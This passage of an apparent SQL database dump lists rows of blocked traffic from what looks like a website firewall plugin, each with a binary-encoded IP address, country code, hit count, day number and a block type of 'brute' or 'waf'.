��','HK',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��e%�','CN',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��e%�','CN',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��e%�','CN',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��ec','VN',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�','VN',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�k','VN',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�k','VN',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��g��','HK',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�','MY',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��ge+','HK',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��ge+','HK',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��g#f','AU',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��g#f','AU',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��g1?','AU',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��g1?','AU',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��g*:f','VN',2,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��g/<,','ID',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��g/<,','ID',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��g3gI','ID',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��g9��','VN',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��gPR!','ID',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0��gQW','VN',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��gQW','VN',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��gR','VN',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��gR','VN',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��gR','VN',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��gR','VN',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��gV�]','IN',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��gZ�j','VN',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��gZ�j','VN',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��gZ��','VN',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��gZ�[','VN',2,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0��gZ�[','VN',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��ge��','VN',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0��ghIo','IN',1,18857,'brute'),('\0\0\0\0\0\0\0\0\0\0��gk�s','VN',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��gm','VN',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��gm','VN',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��gmш','ID',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��gmш','ID',2,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��gmш','ID',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��go(','ID',2,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��go(','ID',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��go(','ID',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��go(','ID',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��gt�','US',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0��gt�','US',1,18863,'brute'),('\0\0\0\0\0\0\0\0\0\0��gt�','US',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��gt�','US',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��gt�','US',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��gt�','US',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��gt�','US',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��gt�','US',2,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��gt�','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��gx�V','IN',2,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��gx��','IN',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��gx��','IN',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��gyY�','VN',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��gyY�','VN',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��gyY�','VN',1,18879,'brute'),('\0\0\0\0\0\0\0\0\0\0��gzj�','ID',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��g{l�','ID',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0��g|\\�','VN',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��g|\\�','VN',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��g|]�','VN',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��g|]�','VN',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��g|]�','VN',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��g|]�','VN',2,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��g|]�','VN',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��g|]�','VN',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��g|_Y','VN',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�','IN',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��g��E','TW',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��g��E','TW',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��g��E','TW',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��g��','VN',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�ڲ','VN',1,18865,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�ڲ','VN',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�t2','ID',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�t2','ID',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�t2','ID',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�p','VN',2,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�p','VN',2,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��g���','IN',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��g���','IN',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�ʖ','ID',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�ʖ','ID',2,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�ʖ','ID',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�\n�','ID',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�\n�','ID',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�\n�','ID',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��g���','IN',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��g���','IN',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��g��8','IN',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��g��8','IN',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�|�','VN',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�|�','VN',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�|�','VN',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�','ID',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�','ID',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�5f','VN',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�l','ID',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�6�','',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�6�','',2,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��gúT','IN',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��g� ','ID',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��gљ ','AU',2,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�y�','IN',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�y�','IN',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�y�','IN',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�t�','ID',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�t�','ID',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�t�','ID',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�>','IR',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�','VN',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��g��','ID',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�','IN',1,18855,'brute'),('\0\0\0\0\0\0\0\0\0\0��g���','NZ',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��h%��','US',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��h+�5','US',1,18857,'brute'),('\0\0\0\0\0\0\0\0\0\0��h��','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��h��','US',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��h��','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��h�f�','US',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��h���','US',2,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0��h��.','US',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0��h��.','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��h��.','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��h�o�','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��h�\0','BE',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��h�\0','BE',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��h�+�','US',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��h�+�','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��h�+�','US',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��h�+�','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��h�P�','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��h�P�','US',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��h�\Z','US',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0��h�\Z','US',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��h�\Z','US',2,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��h�\Z','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��hƬD','US',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��hƬD','US',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��hƬD','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��hƬD','US',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��hǒ','TW',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��h�','US',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��h�-�','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��h�-�','US',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��h�x','US',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��h�x','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��h','JP',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��h','US',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��h�*d','DE',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��h�*d','DE',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��h���','SG',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��h���','SG',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0��h���','SG',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��h���','SG',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0��h���','US',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0��h���','US',2,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��h���','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��h���','US',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��h���','US',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0��h���','US',1,18879,'brute'),('\0\0\0\0\0\0\0\0\0\0��h���','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��h���','DE',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��i9o','ZA',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��i9o','ZA',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0��j\\�','CN',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��j�','CN',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��j)�','CN',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��j)�','CN',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��j)�','CN',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��j4��','CN',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��j4��','CN',3,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��j4��','CN',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��k� \Z','US',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��k�<�','US',2,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��k�<�','US',4,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��k�<�','US',2,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��k�*�','US',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��k��z','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��k��\n','US',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��k��\n','US',2,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��k��\n','US',1,18884,'brute'),('\0\0\0\0\0\0\0\0\0\0��k�X)','US',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��k�X)','US',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��k�X)','US',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��k�X)','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��k�X)','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��k�X)','US',2,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��k�X�','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��k�X�','US',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��k�X�','US',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��k�X�','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��k�g�','US',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��k�i�','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��k�i�','US',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��k���','US',1,18863,'brute'),('\0\0\0\0\0\0\0\0\0\0��k��2','US',1,18863,'brute'),('\0\0\0\0\0\0\0\0\0\0��k��2','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��l��','US',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��l�7�','US',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��l�7�','US',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��l�7�','US',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0��l�7�','US',2,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��l���','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��l���','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��l���','US',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��m��','FR',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��m��','FR',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��m��','FR',2,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��m��','FR',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��m��','FR',2,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��mFd\"','AT',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��mW�','UA',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��mW�','UA',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��mW�','UA',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��ms��','IT',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��ms��','IT',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��ms��','IT',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��ms��','IT',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��m�','BA',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��m�','BA',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��m�','BA',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��m�','BA',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��m�;-','GB',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��m�;-','GB',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��m�;-','GB',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��m�;-','GB',2,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��m�\Z','FR',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��m�\Z','FR',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��m�:','DE',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��n-p','MY',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0��n-p','MY',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��n-�','MY',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0��n��','AU',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��n��','AU',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0��n��','AU',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��n��','AU',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��n��','AU',1,18884,'brute'),('\0\0\0\0\0\0\0\0\0\0��o]8�','IN',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��o]8�','IN',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��o�F','CN',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0��o���','CN',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��p�H�','IN',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��p�H�','IN',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��p�H�','IN',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0��p�H�','IN',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��q�H�','VN',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0��r��','ID',2,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��r��','ID',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��r!Z','TW',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��r!Z','TW',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��t>f�','CN',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��t>f�','CN',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��t>f�','CN',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0��t>f�','CN',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��t>�','CN',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��tv0�','VN',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��tv0�','VN',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��tv0�','VN',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��t�$','DE',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��t��','DE',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��t���','CN',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��t���','CN',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��u,�','VN',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��vHh','CN',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��v','CN',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��vE��','VN',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��vE��','VN',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��w4�','IN',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��w4�','IN',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��w`�;','CN',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0��w`�;','CN',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��w`�;','CN',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��w`�;','CN',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��xO�','CN',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��xO�','CN',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��xO�','CN',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��xO�','CN',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��xO�','CN',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��{+�','VN',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��{+�','VN',2,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��|(��','ID',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��|(��','ID',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��|(��','ID',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��|�\n','VN',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��|��','VN',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��|��','VN',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��|��','VN',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��|��','VN',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��|��','VN',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��|��','VN',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��|��','VN',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��|�f','MY',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��}:w�','JP',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��}:w�','JP',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��}Ϋ�','JP',1,18863,'brute'),('\0\0\0\0\0\0\0\0\0\0��}Ϋ�','JP',4,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��}Ϋ�','JP',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��}Ϋ�','JP',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��}�9','VN',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��}�9','VN',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��}��','VN',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','IN',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','IN',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','IN',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0����R%','SG',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0����R%','SG',2,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0����}�','SG',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���ǝ�','SG',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0������','SG',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0������','SG',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0������','SG',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0������','SG',1,18865,'brute'),('\0\0\0\0\0\0\0\0\0\0������','SG',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0������','SG',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0����','SG',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0����m','SG',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0����m','SG',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','SG',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','SG',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0����]�','CN',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0����I�','IR',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0����I�','IR',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0����J�','IR',2,18858,'waf'),('\0\0\0\0\0\0\0\0\0\0���Hݾ','BR',2,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���Hݾ','BR',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���Hݾ','BR',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���Hݾ','BR',2,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���H�l','CL',2,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���H�l','CL',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0���H�l','CL',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���H�','CL',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0����g$','JP',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0����g$','JP',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0���zR','US',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���zR','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���zR','US',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0���zR','US',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���zR','US',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0���zR','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���z.�','CA',2,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���z.�','CA',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���z.�','CA',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���ђ�','IN',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0���ѓ<','IN',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0����','TH',2,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0����e�','UA',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0����e�','UA',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0����e�','UA',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0����e�','UA',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���}7�','FR',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0���}7�','FR',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���}7�','FR',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0���}7�','FR',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0����\\�','FI',2,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0����\\�','FI',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0����\\�','FI',1,18879,'brute'),('\0\0\0\0\0\0\0\0\0\0������','NL',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0������','NL',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0����T','DE',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0����T','DE',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0���JL�','FR',1,18883,'waf'),('\0\0\0\0\0\0\0\0\0\0���D�\0','GB',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���D��','GB',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0������','US',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0�����\n','US',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0����2','US',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0����2','US',2,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0����2','US',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0���ŃB','CA',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0���ŃB','CA',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���ŃB','CA',1,18884,'brute'),('\0\0\0\0\0\0\0\0\0\0���Ū�','CA',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���Ů�','CA',2,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0����t�','DE',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0�����B','DE',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0���;�','IN',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0���;�','IN',2,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0���;�','IN',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���;�','IN',2,18870,'brute'),(